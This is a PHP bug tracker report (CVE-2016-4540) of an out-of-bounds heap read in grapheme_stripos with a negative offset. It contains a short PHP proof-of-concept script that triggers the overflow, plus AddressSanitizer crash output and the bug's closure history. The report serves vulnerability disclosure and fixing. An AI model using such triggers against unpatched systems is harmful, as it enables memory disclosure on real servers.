Out-of-bounds reads in zif_grapheme_stripos with negative offset
| Sec Bug #72061 | Out-of-bounds reads in zif_grapheme_stripos with negative offset | ||||
|---|---|---|---|---|---|
| Submitted: | 2016-04-20 07:22 UTC | Modified: | 2016-05-06 06:45 UTC | ||
| From: | fernando at null-life dot com | Assigned: | stas (profile) | ||
| Status: | Closed | Package: | intl (PECL) | ||
| PHP Version: | 5.5.34 | OS: | Linux | ||
| Private report: | No | CVE-ID: | 2016-4540 | ||
[2016-04-20 07:22 UTC] fernando at null-life dot com
Description:
------------
Run with PHP/ASAN
The offset parameter reads from arbitrary memory when a negative value is passed and the first parameter is an array element.
Test script:
---------------
<?php
$vals = [ 1, 1, 1, 1, 1, 1, 1,1, 1, 1, 1, 1, 1, 1,1,1, 1, 1, 1, 1, 1, 1,1,1, 1,1, 1, 1, 1, 1, 1,1, 1, 1, 1,1,1,1,1,
1,1,1, 1, 1, 1,1,1, 1, 1, 1, 1 , 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,1, 1,1, 1,1,1, 1 ,
str_repeat("ABCD", 16384) ];
grapheme_stripos($vals[76], "A", -201);
Expected result:
----------------
no crash
Actual result:
--------------
==16765==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb0ebf747 at pc 0xb71b3c35 bp 0xbff95058 sp 0xbff94c2c
READ of size 202 at 0xb0ebf747 thread T0
#0 0xb71b3c34 (/usr/lib/i386-linux-gnu/libasan.so.2+0x37c34)
#1 0xaf8e42c5 in zend_memnstr /home/fmunozs/phpgit/php56/Zend/zend_operators.h:280
#2 0xaf8e42c5 in zif_grapheme_stripos /home/fmunozs/phpgit/php56/ext/intl/grapheme/grapheme_string.c:222
#3 0x9a7c718 in zend_do_fcall_common_helper_SPEC /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:558
#4 0x9640316 in execute_ex /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:363
#5 0x9a6c9c8 in zend_execute /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:388
#6 0x9470b59 in zend_execute_scripts /home/fmunozs/phpgit/php56/Zend/zend.c:1341
#7 0x91acc6b in php_execute_script /home/fmunozs/phpgit/php56/main/main.c:2613
#8 0x9a8648a in do_cli /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:994
#9 0x808a502 in main /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:1378
#10 0xb6d61645 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18645)
#11 0x808aaba (/home/fmunozs/phpgit/php56/sapi/cli/php+0x808aaba)
0xb0ebf747 is located 185 bytes to the left of 262144-byte region [0xb0ebf800,0xb0eff800)
allocated by thread T0 here:
#0 0xb7212d06 in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96d06)
#1 0x92e8597 in zend_mm_mem_malloc_alloc /home/fmunozs/phpgit/php56/Zend/zend_alloc.c:287
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
0x361d7e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x361d7ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x361d7eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x361d7ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x361d7ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x361d7ee0: fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa
0x361d7ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x361d7f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x361d7f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x361d7f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x361d7f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==16765==ABORTING
Patches
Pull Requests
History
AllCommentsChangesGit/SVN commits
[2016-04-24 19:41 UTC] stas@php.net
-Summary: AddressSanitizer: heap-buffer-overflow zif_grapheme_stripos +Summary: Out-of-bounds reads in zif_grapheme_stripos with negative offset
[2016-04-24 19:41 UTC] stas@php.net
[2016-04-24 19:41 UTC] stas@php.net
-PHP Version: 5.6.20 +PHP Version: 5.5.34
[2016-04-24 20:17 UTC] stas@php.net
-Assigned To: +Assigned To: stas
[2016-04-25 03:36 UTC] fernando at null-life dot com
[2016-04-27 05:56 UTC] stas@php.net
-Status: Assigned +Status: Closed
[2016-05-06 06:45 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2016-4540
[2016-05-06 06:45 UTC] remi@php.net